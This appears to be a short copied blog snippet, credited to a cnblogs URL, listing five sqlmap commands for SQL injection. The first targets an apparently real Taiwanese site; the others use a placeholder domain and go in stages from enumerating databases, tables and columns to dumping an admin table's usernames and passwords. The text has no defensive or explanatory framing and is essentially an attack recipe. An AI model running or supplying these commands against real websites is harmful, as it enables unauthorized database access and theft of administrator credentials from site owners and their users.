sqlmap -u http://www.com.tw/star_photo.php?artist_id=11
sqlmap -u http://www.xxxx.com/getcustomer.asp?q=1 --dbs --current-user --current-db
sqlmap -u http://www.xxxx.com/getcustomer.asp?q=1 -D xxxSQL --tables
sqlmap -u http://www.xxxx.com/getcustomer.asp?q=1 -D xxxSQL -T DB_admin --columns
sqlmap -u http://www.xxxx.com/getcustomer.asp?q=1 -D xxxSQL -T admin -C id,,username,userpws --dump
原文:http://www.cnblogs.com/xue6666/p/4370079.html